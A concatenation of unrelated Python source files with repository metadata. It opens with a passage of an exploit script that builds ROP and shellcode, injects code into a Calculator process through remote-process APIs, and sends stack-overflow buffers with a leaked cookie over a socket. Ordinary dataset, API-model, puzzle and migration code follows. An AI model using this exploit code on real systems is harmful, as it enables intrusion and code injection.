shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push %s" % hex(kernelBase))
shellcode += egg.nut_asm("call esi")
shellcode += egg.nut_asm("mov [ebp + 16], eax") #VirtualAlloEx
shellcode += egg.nut_asm("push 0x%s" % Open[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Open[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Open[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push %s" % hex(kernelBase))
shellcode += egg.nut_asm("call esi")
shellcode += egg.nut_asm("mov [ebp + 20], eax") #OpenProcess
shellcode += egg.nut_asm("push 0x%s" % Write[16:20][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Write[12:16][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Write[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Write[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Write[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push %s" % hex(kernelBase))
shellcode += egg.nut_asm("call esi")
shellcode += egg.nut_asm("mov [ebp + 24], eax") #WriteProcess
shellcode += egg.nut_asm("push 0x%s" % Create[16:20][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Create[12:16][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Create[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Create[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % Create[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push %s" % hex(kernelBase))
shellcode += egg.nut_asm("call esi")
shellcode += egg.nut_asm("mov [ebp + 28], eax") #CreateRemoteProcess
calc = "Calculator\x00"
shellcode += egg.nut_asm("push 0x%s" % calc[8:12][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % calc[4:8][::-1].encode("hex"))
shellcode += egg.nut_asm("push 0x%s" % calc[:4][::-1].encode("hex"))
shellcode += egg.nut_asm("mov [ebp + 32], esp")
shellcode += egg.nut_asm("mov eax, [ebp + 4]")
shellcode += egg.nut_asm("xor edi, edi")
shellcode += egg.nut_asm("push [ebp + 32]")
shellcode += egg.nut_asm("push edi")
shellcode += egg.nut_asm("call eax") # FindWindow(NULL, "Calculator")
shellcode += egg.nut_asm("mov [ebp + 36], eax")
shellcode += egg.nut_asm("mov eax, [ebp + 8]")
shellcode += egg.nut_asm("push esp")
shellcode += egg.nut_asm("push [ebp + 36]")
shellcode += egg.nut_asm("call eax") # GetWindowThreadProcessId([ebp + 28], esp)
shellcode += egg.nut_asm("mov eax, [esp]")
shellcode += egg.nut_asm("mov ebx, [ebp + 20]")
shellcode += egg.nut_asm("push eax")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push 0x1f0fff")
shellcode += egg.nut_asm("call ebx") # OpenProcess(process_all, False, pid)
shellcode += egg.nut_asm("mov [ebp + 40], eax") # handle
shellcode += egg.nut_asm("mov ebx, [ebp+16]")
shellcode += egg.nut_asm("push 0x40")
shellcode += egg.nut_asm("push 0x1000")
shellcode += egg.nut_asm("push %s" % hex(len(sc_msgbox)))
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push [ebp + 40]")
shellcode += egg.nut_asm("call ebx") # VirtuallAllocEx(handle, 0, len(winexec), 0x1000, 0x40)
shellcode += egg.nut_asm("mov [ebp + 44], eax") # remote_mem
shellcode += egg.nut_asm("mov ebx, [ebp + 24]")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push %s" % hex(len(sc_msgbox)))
shellcode += egg.nut_asm("push %s" % hex(egg_heap+0x2A3))
shellcode += egg.nut_asm("push eax")
shellcode += egg.nut_asm("push [ebp + 40]")
shellcode += egg.nut_asm("call ebx")
shellcode += egg.nut_asm("mov ebx, [ebp + 28]")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push [ebp + 44]")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("push [ebp + 40]")
shellcode += egg.nut_asm("call ebx")
shellcode += egg.nut_asm("mov eax, [ebp + 12]")
shellcode += egg.nut_asm("push 0x0")
shellcode += egg.nut_asm("call eax")
shellcode += "\x90"*10
shellcode += sc_msgbox
rop = p (virtualAlloc)
rop += p (egg_heap + 30)
rop += p (egg_heap)
rop += p (0x1000)
rop += p (0x1000)
rop += p (0x40)
rop += p (egg_heap + 30)
rop += "\x90"* 10
rop += shellcode
s.send(cookie + p(0x468) + p(0x1000) + "\x90"*(0x200 - (8 + len(cookie))))
s.send(rop + "\x90"*(1092 - len(rop)) + cookie + "B"*(0x468 - 1096 - 8) + p(kernelBase+0x2e170) + "BBBB" )
s.send(rop + "B"*(0x1000 - len(rop)))
if i > 3:
s.send(cookie + p(0x1000) + p(0x1) + "\x90"*(0x200 - (8 + len(cookie))))
s.send("A"*(0x1000 + 1))
| [
"kalianon2816@gmail.com"
] | kalianon2816@gmail.com |
4cf9b4ddf5b75a0c24363f4cabbb4a2c429cd06e | 1d9e681b204e6ec2d7a710ef45b7dec082239491 | /venv/Lib/site-packages/od_python/models/inline_response_200_23.py | be19e551a11c272b3e2fa1c510c9a94e50aeca25 | [] | no_license | 1chimaruGin/DotaAnalysis | 0e0b85805cc83e4cc491d46f7eadc014e8d6b1f1 | 6a74cde2ee400fc0dc96305203d60c5e56d7ecff | refs/heads/master | 2020-07-21T20:48:07.589295 | 2019-09-07T12:20:15 | 2019-09-07T12:20:15 | 206,972,180 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,972 | py | # coding: utf-8
"""
OpenDota API
# Introduction The OpenDota API provides Dota 2 related data including advanced match data extracted from match replays. Please keep request rate to approximately 1/s. **Begining 4/22/2018, the OpenDota API will be limited to 50,000 free calls per month.** We'll be offering a Premium Tier with unlimited API calls and higher rate limits. Check out the [API page](https://www.opendota.com/api-keys) to learn more.
OpenAPI spec version: 17.6.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class InlineResponse20023(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'duration_bin': 'str',
'games_played': 'int',
'wins': 'int'
}
attribute_map = {
'duration_bin': 'duration_bin',
'games_played': 'games_played',
'wins': 'wins'
}
def __init__(self, duration_bin=None, games_played=None, wins=None):
"""
InlineResponse20023 - a model defined in Swagger
"""
self._duration_bin = None
self._games_played = None
self._wins = None
if duration_bin is not None:
self.duration_bin = duration_bin
if games_played is not None:
self.games_played = games_played
if wins is not None:
self.wins = wins
@property
def duration_bin(self):
"""
Gets the duration_bin of this InlineResponse20023.
Lower bound of number of seconds the match lasted
:return: The duration_bin of this InlineResponse20023.
:rtype: str
"""
return self._duration_bin
@duration_bin.setter
def duration_bin(self, duration_bin):
"""
Sets the duration_bin of this InlineResponse20023.
Lower bound of number of seconds the match lasted
:param duration_bin: The duration_bin of this InlineResponse20023.
:type: str
"""
self._duration_bin = duration_bin
@property
def games_played(self):
"""
Gets the games_played of this InlineResponse20023.
Number of games played
:return: The games_played of this InlineResponse20023.
:rtype: int
"""
return self._games_played
@games_played.setter
def games_played(self, games_played):
"""
Sets the games_played of this InlineResponse20023.
Number of games played
:param games_played: The games_played of this InlineResponse20023.
:type: int
"""
self._games_played = games_played
@property
def wins(self):
"""
Gets the wins of this InlineResponse20023.
Number of wins
:return: The wins of this InlineResponse20023.
:rtype: int
"""
return self._wins
@wins.setter
def wins(self, wins):
"""
Sets the wins of this InlineResponse20023.
Number of wins
:param wins: The wins of this InlineResponse20023.
:type: int
"""
self._wins = wins
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, InlineResponse20023):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"kyitharhein18@gmail.com"
] | kyitharhein18@gmail.com |
42376b861ece80075b0aeda3fb258441d5be2c61 | 65df0fbd17c7afae6e5073fff818dd28b7d0c4c8 | /assignment1/pythonFiles/getURIRedirect.py | cf7c1e1aca9fa35dfb1f0cacc9e88e32a0f482fe | [
"MIT"
] | permissive | khajamasroorahmed/cs851-s15 | 8ef3e1115425ef050803ba940b00c5f15c2ee14f | 45217f23c7c940543697e355100644252bb90520 | refs/heads/master | 2021-01-18T08:40:13.310490 | 2015-05-02T09:10:38 | 2015-05-02T09:10:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 708 | py | #CS751 Spring 2015 Offered by Dr. Michael Nelson - Assignment 1
#Filename: getURIRedirect.py
#Author: Khaja Masroor Ahmed
#UIN: 00999044
#CS Email: kahmed@cs.odu.edu
import json
f = open('status.txt','r+')
w = open('uriRedirect.txt','w')
w2 = open('uriRedirectCount.txt','w')
uriRedirect = {}
for line in f:
data = json.loads(line)
count = 0
for tweetData in data['tweetURLData']:
for status in tweetData['statusCode']:
if(str(status).startswith('3')):
count = count + 1
w.write(str(count) + '\t' + tweetData['finalURL'] + '\n')
if count in uriRedirect:
uriRedirect[count] = uriRedirect[count] + 1
else:
uriRedirect[count] = 1
w2.write(str(uriRedirect) + '\n')
w.close()
w2.close()
| [
"max.bizarre@gmail.com"
] | max.bizarre@gmail.com |
c7bc15d72bb90e5fb7c6d3a794bcdc3c286ee53a | a3926c09872e1f74b57431fbb3e711918a11dc0a | /python/hash_table/1346_check_if_n_and_its_double_exist.py | a5c2c203328d0dbf68510dd50017a7aac7c37ec2 | [
"MIT"
] | permissive | linshaoyong/leetcode | e64297dc6afcebcee0614a153a566323bf223779 | 57080da5fbe5d62cbc0b8a34e362a8b0978d5b59 | refs/heads/main | 2022-09-15T00:05:36.476268 | 2022-08-16T14:09:11 | 2022-08-16T14:09:11 | 196,914,051 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 582 | py | class Solution(object):
def checkIfExist(self, arr):
"""
:type arr: List[int]
:rtype: bool
"""
sa = set()
for a in arr:
if 2 * a in sa or (a % 2 == 0 and a // 2 in sa):
return True
sa.add(a)
return False
def test_check_if_exist():
s = Solution()
assert s.checkIfExist([10, 2, 5, 3])
assert s.checkIfExist([7, 1, 14, 11])
assert s.checkIfExist([3, 1, 7, 11]) is False
assert s.checkIfExist([-2, 0, 10, -19, 4, 6, -8]) is False
assert s.checkIfExist([0, 0])
| [
"linshaoyong@gmail.com"
] | linshaoyong@gmail.com |
120135cf7bd569963888ffe1e1a46f48570cdbf8 | 524f3dfc55411c6bde7d5a0386f33f57adcc7f33 | /ARCTIC_reader.py | 46cb595967edb5664e6bbd6041b7be6a1ca3cace | [] | no_license | socom20/speech-cloner | 776f61b28a35a99bb0ed7606638925d9dbea74b7 | 3ad0828b5419e004a5bf7fe05f94954677e5bdee | refs/heads/master | 2020-05-07T10:42:01.013476 | 2019-07-15T02:21:50 | 2019-07-15T02:21:50 | 180,427,808 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,983 | py | import numpy as np
import matplotlib.pyplot as plt
import os, sys
import librosa
import pickle
import hashlib
import h5py
from collections import namedtuple
from audio_lib import calc_MFCC_input, calc_PHN_target
from sound_ds import Sound_DS
class ARCTIC(Sound_DS):
def __init__(self, cfg_d={}):
self.cfg_d = cfg_d
if 'hop_length' not in self.cfg_d.keys():
self.cfg_d['hop_length'] = int(self.cfg_d['hop_length_ms'] * self.cfg_d['sample_rate'] / 1000.0)
print(" - cfg_d['hop_length'] = {:d}".format(self.cfg_d['hop_length']))
if 'win_length' not in self.cfg_d.keys():
self.cfg_d['win_length'] = int(self.cfg_d['win_length_ms'] * self.cfg_d['sample_rate'] / 1000.0)
print(" - cfg_d['win_length'] = {:d}".format(self.cfg_d['win_length']))
self.ds_path = cfg_d['ds_path']
self.random_seed = cfg_d['random_seed']
self.verbose = cfg_d['verbose']
self.ds_norm = cfg_d['ds_norm']
self.n_mfcc = cfg_d['n_mfcc'] # Cantidad de mfcc en la salida
self.n_timesteps = cfg_d['n_timesteps'] # Cantidad de de pasos temporales para el muestreo window_sampler
if self.random_seed is not None:
np.random.seed(self.random_seed)
self.sample_rate = cfg_d['sample_rate']
self.ds_type_v = np.array(['TRAIN', 'TEST'])
self.ds_dialect_v = np.array(['DR'+str(i) for i in range(1,9)])
self.ds_gender_v = np.array(['M', 'F'])
self.ds_phoneme_43_v = np.array(['b', 'd', 'g', 'p', 't', 'k', # Stops
'jh', 'ch', # Affricates
's', 'sh', 'z', 'zh', 'f', 'th', 'v', 'dh', # Fricatives
'm', 'n', 'ng', # Nasals
'l', 'r', 'w', 'y', 'hh', # Semivowels and Glides
'aa', 'ae', 'ah', 'ao', 'aw', 'ax', 'ay', 'eh', 'er', 'ey', 'ih', 'iy', 'ow', 'oy', 'uh', 'uw', # Vowels
'H#', 'pau', 'ssil']) # Others
self.ds_cache_name = cfg_d['ds_cache_name']
phn_mfcc_name_id = hashlib.md5('_'.join([str(cfg_d[k]) for k in ('sample_rate',
'pre_emphasis',
'hop_length',
'win_length',
'n_mels',
'n_mfcc',
'n_fft',
'window',
'mfcc_normaleze_first_mfcc',
'mfcc_norm_factor',
'calc_mfcc_derivate',
'M_dB_norm_factor',
'P_dB_norm_factor',
'mean_abs_amp_norm',
'clip_output')]).encode()).hexdigest()
self.spec_cache_name = '.'.join(cfg_d['spec_cache_name'].split('.')[:-1]) + '_' + phn_mfcc_name_id + '.' + cfg_d['spec_cache_name'].split('.')[-1]
self.ds = None
if not os.path.exists( os.path.join(self.ds_path, self.ds_cache_name) ) or cfg_d['remake_samples_cache']:
self.read_dataset_from_disk(self.verbose)
self.save_dataset_cache()
else:
self.load_dataset_cache()
self._normalize_ds()
self.make_phoneme_convertion_dicts()
if not os.path.exists(os.path.join(self.ds_path, self.spec_cache_name)):
r = ''
while not r in ['y', 'n']:
print(' - ARCTIC, no se encontró el archivo de cache "{}", desea construirlo (y/n):'.format(self.spec_cache_name), end='')
r = input()
if r == 'y':
self.create_spec_cache()
else:
print(' - ARCTIC, no se puede continuar sin generar el archivo de cache.', file=sys.stderr)
return None
return None
def create_spec_cache(self, cfg_d=None):
if cfg_d is None:
cfg_d = self.cfg_d
if os.path.exists(os.path.join(self.ds_path, self.spec_cache_name)):
print(' WARNING, create_spec_cache: el archivo "{}" ya existe, para generarlo de nuevo primero se debe eliminar.', file=sys.stderr)
return None
phn_conv_d = self.phn2ohv
n_samples = len(self.ds['wav'])
print(' - create_spec_cache, Salvando {} cache'.format(self.spec_cache_name))
with h5py.File(os.path.join(self.ds_path, self.spec_cache_name),'w') as ds_h5py:
grp_mfcc = ds_h5py.create_group("mfcc")
grp_mel_dB = ds_h5py.create_group("mel_dB")
grp_power_dB = ds_h5py.create_group("power_dB")
grp_phn = ds_h5py.create_group("phn")
phn_conv_d = self.phn2ohv
for i_sample in range(n_samples):
if self.verbose and i_sample%100==0:
print(' - Saved: {} of {} samples'.format(i_sample, n_samples))
y = self.ds['wav'][i_sample]
phn_v = self.ds['phn_v'][i_sample]
mfcc, mel_dB, power_dB = calc_MFCC_input(y,
sr=cfg_d['sample_rate'],
pre_emphasis=cfg_d['pre_emphasis'],
hop_length=cfg_d['hop_length'],
win_length=cfg_d['win_length'],
n_mels=cfg_d['n_mels'],
n_mfcc=cfg_d['n_mfcc'],
n_fft=cfg_d['n_fft'],
window=cfg_d['window'],
mfcc_normaleze_first_mfcc=cfg_d['mfcc_normaleze_first_mfcc'],
mfcc_norm_factor=cfg_d['mfcc_norm_factor'],
calc_mfcc_derivate=cfg_d['calc_mfcc_derivate'],
M_dB_norm_factor=cfg_d['M_dB_norm_factor'],
P_dB_norm_factor=cfg_d['P_dB_norm_factor'],
mean_abs_amp_norm=cfg_d['mean_abs_amp_norm'],
clip_output=cfg_d['clip_output'])
phn = calc_PHN_target(y, phn_v, phn_conv_d,
hop_length=cfg_d['hop_length'],
win_length=cfg_d['win_length'])
assert mfcc.shape[0] == phn.shape[0], '- ERROR, create_spec_cache: para la muestra {}, mfcc.shape[0] != phn.shape[0]'.format(i_sample)
grp_mfcc.create_dataset( str(i_sample), data=mfcc)
grp_mel_dB.create_dataset( str(i_sample), data=mel_dB)
grp_power_dB.create_dataset(str(i_sample), data=power_dB)
grp_phn.create_dataset( str(i_sample), data=phn)
##
if self.verbose:
print('Archivo "{}" escrito en disco.'.format(self.spec_cache_name))
## ds_h5py['mfcc'][i_sample] = mfcc
## ds_h5py['phn'][i_sample] = phn
return None
def read_dataset_from_disk(self, verbose=False):
self.ds = {'wav': [], # Sound wave
'spk_id': [], # Spreaker Id
'phn_v': [], # Phoneme list
'sts_id': []} # Sentence id
if verbose:
print(' - ARCTIC, read_dataset_from_disk, leyendo ARCTIC dataset desde:'.format(self.ds_path))
n_samples = 0
for spk_dir in os.listdir(self.ds_path):
if verbose:
print(' - ARCTIC, read_dataset_from_disk, leyendo: "{}"'.format(spk_dir))
if os.path.isdir( os.path.join(self.ds_path, spk_dir) ):
spk_id = spk_dir.split('_')[-2]
abs_spk_dir = os.path.join(self.ds_path, spk_dir)
wav_dir = os.path.join(abs_spk_dir, 'wav')
phn_dir = os.path.join(abs_spk_dir, 'lab')
for wav_file_name in sorted( os.listdir(wav_dir) ):
if len(wav_file_name) > 3 and wav_file_name[-4:] == '.wav':
sts_id = wav_file_name.split('_')[-1].split('.')[0]
abs_wav_file_name = os.path.join(wav_dir, wav_file_name)
abs_phn_file_name = os.path.join(phn_dir, wav_file_name.replace('wav', 'lab'))
wav = self.read_wav(abs_wav_file_name)
phn_v = self.read_phn(abs_phn_file_name)
self.ds['wav'].append(wav)
self.ds['phn_v'].append(phn_v)
self.ds['spk_id'].append(spk_id)
self.ds['sts_id'].append(sts_id)
n_samples += 1
for k in self.ds.keys():
self.ds[k] = np.array(self.ds[k])
if verbose:
print(' - ARCTIC, read_dataset_from_disk, DateSet leido ARCTIC, cantidad de archivos leidos: {}'.format(n_samples))
return None
def read_wav(self, file_path='./TEST/DR1/FAKS0/SA1.WAV'):
y, sr = librosa.load(file_path, sr=self.sample_rate)
return y
def read_phn(self, file_path='./TEST/DR1/FAKS0/SA1.PHN'):
with open(file_path , 'r') as f:
ml_v = f.readlines()
phn_v = []
last = 0
for ml in ml_v:
l_v = ml.strip().split()
if len(l_v) == 3:
phn_v.append( (last, int(self.sample_rate*float(l_v[0])), l_v[2]) )
last = phn_v[-1][1]
return phn_v
def make_phoneme_convertion_dicts(self):
""" Arma los diccionarios de conversión de phonemes según la agrupación que se quiera usar"""
self.phn2ohv = {} # Conversión de phonema_str a one_hot_vector
self.phn2idx = {} # Conversión de phonema_str a index
self.idx2phn = {} # Conversión de index a phonema_str
for idx, phn in enumerate(self.ds_phoneme_43_v):
ohv = np.zeros(len(self.ds_phoneme_43_v))
ohv[idx] = 1.0
self.phn2ohv[phn] = ohv
self.phn2idx[phn] = idx
self.idx2phn[idx] = phn
self.n_phn = len(self.ds_phoneme_43_v)
return None
def window_sampler(self, batch_size=32, n_epochs=1, randomize_samples=True, sample_trn=True, prop_val=0.3, ds_filter_d={'spk_id':['bdl','rms','slt','clb']}, yield_idxs=False):
n_timesteps=self.n_timesteps
f_s = self.get_ds_filter(ds_filter_d)
samples_v = np.arange(f_s.shape[0])[f_s]
samples_v = np.array( [str(i) for i in samples_v] )
if prop_val > 0.0:
np.random.seed(0)# Some seed
idx_v = np.arange(samples_v.shape[0])
np.random.shuffle(idx_v)
n_val = int(prop_val*samples_v.shape[0])
idx_trn = idx_v[:-n_val]
idx_val = idx_v[-n_val:]
if sample_trn:
samples_v = samples_v[idx_trn]
else:
samples_v = samples_v[idx_val]
np.random.seed(self.random_seed)
with h5py.File(os.path.join(self.ds_path, self.spec_cache_name),'r') as ds_h5py:
x_v = []
y_v = []
n_warning = 0
idxs_v = []
for i_epoch in range(n_epochs):
if randomize_samples:
np.random.shuffle(samples_v)
for i_sample in samples_v:
## print('sample', i_sample)
## print(mfcc.shape, phn.shape)
spec_len = ds_h5py['mfcc'][i_sample].shape[0]
if spec_len <= n_timesteps:
# Padding
i_s = 0
i_e = n_timesteps
mfcc = ds_h5py['mfcc'][i_sample][:]
phn = ds_h5py['phn'][i_sample][:]
pad_len = n_timesteps - spec_len
mfcc, phn = self._zero_pad(mfcc, phn, pad_len=pad_len)
# Makeing phoneme target
idx = arctic.phn2idx['pau']
phn[-pad_len:,idx] = 1.0
if n_warning < 5:
print('WARNING: padding!!!'.format(i_sample))
n_warning += 1
else:
# Solamente elegimos un frame por wav
# TODO: llevar la cuenta de los frames elegidos como i_sample asi siempre elegimos uno distinto
i_s = np.random.randint(0, spec_len-n_timesteps)
i_e = i_s + n_timesteps
mfcc = ds_h5py['mfcc'][i_sample][i_s:i_e]
phn = ds_h5py['phn'][i_sample][i_s:i_e]
x_v.append( mfcc )
y_v.append( phn )
idxs_v.append([i_s, i_e, int(i_sample)])
if len(x_v) == batch_size:
x_v = np.array(x_v)
y_v = np.array(y_v)
assert x_v.shape[1] == y_v.shape[1] == n_timesteps
if yield_idxs:
idxs_v = np.array(idxs_v)
yield x_v, y_v, idxs_v
else:
yield x_v, y_v
x_v = []
y_v = []
idxs_v = []
def calc_class_weights(self, clip=(0,10), ds_filter_d={'spk_id':['bdl','rms','slt','clb']}):
f_s = self.get_ds_filter(ds_filter_d)
samples_v = np.arange(f_s.shape[0])[f_s]
samples_v = [str(i) for i in samples_v]
counter_v = None
with h5py.File(os.path.join(self.ds_path, self.spec_cache_name),'r') as ds_h5py:
for i_s in samples_v:
if counter_v is None:
counter_v = np.sum(ds_h5py['phn'][str(i_s)], axis=0)
else:
counter_v += np.sum(ds_h5py['phn'][str(i_s)], axis=0)
n_samples = int(np.sum(counter_v))
majority = np.mean(counter_v)
cw_d = {cls: float(majority/count) if count > 0 else 1.0 for cls, count in enumerate(counter_v)}
if clip is not None:
for k in cw_d.keys():
cw_d[k] = np.clip(cw_d[k], clip[0], clip[1])
return cw_d, n_samples
# 6 119 737
if __name__ == '__main__':
import time
if os.name == 'nt':
ds_path = r'G:\Downloads\ARCTIC\cmu_arctic'
else:
ds_path = '/media/sergio/EVO970/UNIR/TFM/code/data_sets/ARCTIC/cmu_arctic'
ds_cfg_d = {'ds_path':ds_path,
'ds_norm':(0.0, 1.0),
'remake_samples_cache':False,
'random_seed':0,
'ds_cache_name':'arctic_cache.pickle',
'spec_cache_name':'spec_cache.h5py',
'verbose':True,
'sample_rate':16000, #Frecuencia de muestreo los archivos de audio Hz
'pre_emphasis': 0.97,
'hop_length_ms': 5.0, # 2.5ms = 40c | 5.0ms = 80c (@ 16kHz)
'win_length_ms': 25.0, # 25.0ms = 400c (@ 16kHz)
'n_timesteps': 400, # 800ts*(win_length_ms=2.5ms)= 2000ms Cantidad de hop_length_ms en una ventana de prediccion.
'n_mels':80,
'n_mfcc':40,
'n_fft':None, # None usa n_fft=win_length
'window':'hann',
'mfcc_normaleze_first_mfcc':True,
'mfcc_norm_factor': 0.01,
'calc_mfcc_derivate':False,
'M_dB_norm_factor':0.01,
'P_dB_norm_factor':0.01,
'mean_abs_amp_norm':0.003,
'clip_output':True}
arctic = ARCTIC(ds_cfg_d)
## mfcc_batch, phn_v_batch, idxs_v_batch = next(iter(arctic.window_sampler(10, 1, yield_idxs=True, ds_filter_d={'spk_id':'bdl'})))
## for mfcc, phn_v, idxs_v in zip(mfcc_batch, phn_v_batch, idxs_v_batch):
#### print(idxs_v)
## arctic.spec_show(mfcc, phn_v, idxs_v)
mfcc_batch, mel_batch, stft_batch, idxs_v_batch = next(iter(arctic.spec_window_sampler(50,1, yield_idxs=True)))
for mfcc, mel, stft, idxs_v in zip(mfcc_batch, mel_batch, stft_batch, idxs_v_batch):
print(idxs_v)
arctic.spec_show(stft, None, idxs_v)
## for i_sample in range(0, len(arctic.ds['wav'])):
## m, _, _ = calc_MFCC_input(arctic.ds['wav'][i_sample])
## p = calc_PHN_target(arctic.ds['wav'][i_sample], arctic.ds['phn_v'][i_sample], arctic.phn2ohv)
##
##
## for a, b, p_str in arctic.ds['phn_v'][i_sample]:
## print('{:5d} -> {:5d} : delta:{:5d} : {}'.format(a//40,b//40, (b-a)//40, p_str))
##
##
## arctic.spec_show(m, p)
##
## break
##
## t0 = time.time()
## n_batch=0
## for mfcc, phn in arctic.window_sampler(batch_size=32, n_epochs=1, ds_filter_d={}):
## n_batch += 1
#### print(mfcc.shape)
#### print(phn.shape)
## print(' Muestreo completo en {:0.02f} s, n_batches={}'.format(time.time() - t0, n_batch))
## for x, y in arctic.phoneme_sampler():
## for i in range(len(x)):
## if np.argmax(y[i]) == np.argmax(arctic.phoneme_d['ae']):
## arctic.play(x[i])
## input()
## for a, b, p in phn_v:
## y_aux = np.concatenate( (np.zeros(arctic.sample_rate), y[a:b] ))
## y_aux = np.concatenate([y_aux,y_aux,y_aux])
## _=plt.plot(y_aux)
## arctic.play_sound(y_aux)
## print(p)
## plt.show()
| [
"49447659+socom20@users.noreply.github.com"
] | 49447659+socom20@users.noreply.github.com |
50a7a10cb9a1aa88a71c786a4b06da91c96801bc | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/anagram/7a7f1153e39747b2922e1c830c65ac0a.py | 23159322f0bf7864d05c50ccb0628b12b1aae17c | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 246 | py | def detect_anagrams(word, possibles):
found = []
for possible in possibles:
if sorted(list(word.lower())) == sorted(list(possible.lower())) and word.lower() != possible.lower():
found.append(possible)
return found
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
528c4a1f5896ec1fbbc0e2b833b6a51ca7381b80 | 17cbe826892d06dc5aee4e4c2a5747e10933f2d0 | /hmtl/modules/text_field_embedders/__init__.py | 233345c6669cbadde24653011c00aa7013aa3810 | [
"MIT"
] | permissive | rahular/joint-coref-srl | 3fdd0e37a56e3be894f3da4ceeb030a599ff4388 | cd85fb4e11af1a1ea400ed657d0a4511c1d6c6be | refs/heads/main | 2023-02-16T21:53:11.721014 | 2021-01-18T15:31:47 | 2021-01-18T15:31:47 | 330,708,579 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | # coding: utf-8
from hmtl.modules.text_field_embedders.shortcut_connect_text_field_embedder import (
ShortcutConnectTextFieldEmbedder,
)
| [
"rahul@di.ku.dk"
] | rahul@di.ku.dk |
9e6a32c74ef8c3f40f7b6e855c2a9e2e658eb9af | a3485f1573fb1d2e9c029e37acf040e0dc669301 | /BackgroundProgram/market/apps/users/migrations/0002_auto_20170704_1624.py | 7db364b0f97898394733c9f0372feede625cd8b9 | [] | no_license | lgb020/SupermarketFastCashier | ac132368695dfcb49af2ed5470e6f5fa5336f451 | 2c6f8987431d305f0a76cbda0625b445224e7d07 | refs/heads/master | 2020-04-25T01:38:54.812102 | 2019-02-21T14:12:31 | 2019-02-21T14:12:31 | 172,414,753 | 0 | 1 | null | 2019-02-25T01:41:51 | 2019-02-25T01:41:51 | null | UTF-8 | Python | false | false | 492 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-04 16:24
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='mobileverifyrecord',
options={'ordering': ['-send_time'], 'verbose_name': '电话验证码', 'verbose_name_plural': '电话验证码'},
),
]
| [
"jpf199727@gmail.com"
] | jpf199727@gmail.com |
224c593b401c1b0ef3ab7e2b9e9e5ccc27c82d6b | 0a2e72ea9c7057296ad666125b9c51983a6d33e6 | /web.py | 4fd39de8a799b6b53ea6cb058f134f552596d3ec | [] | no_license | pavankumarmeruva/python | c417cb8b0d0a1ec776943d0e1308dfa30317eb39 | 6bc10050504018b6f0bdb0f5d5a580671d381d2d | refs/heads/master | 2021-03-08T06:41:32.587899 | 2020-03-31T03:07:34 | 2020-03-31T03:07:34 | 246,327,123 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,037 | py | #!/usr/bin/python
print "#!/usr/bin/python
print \"
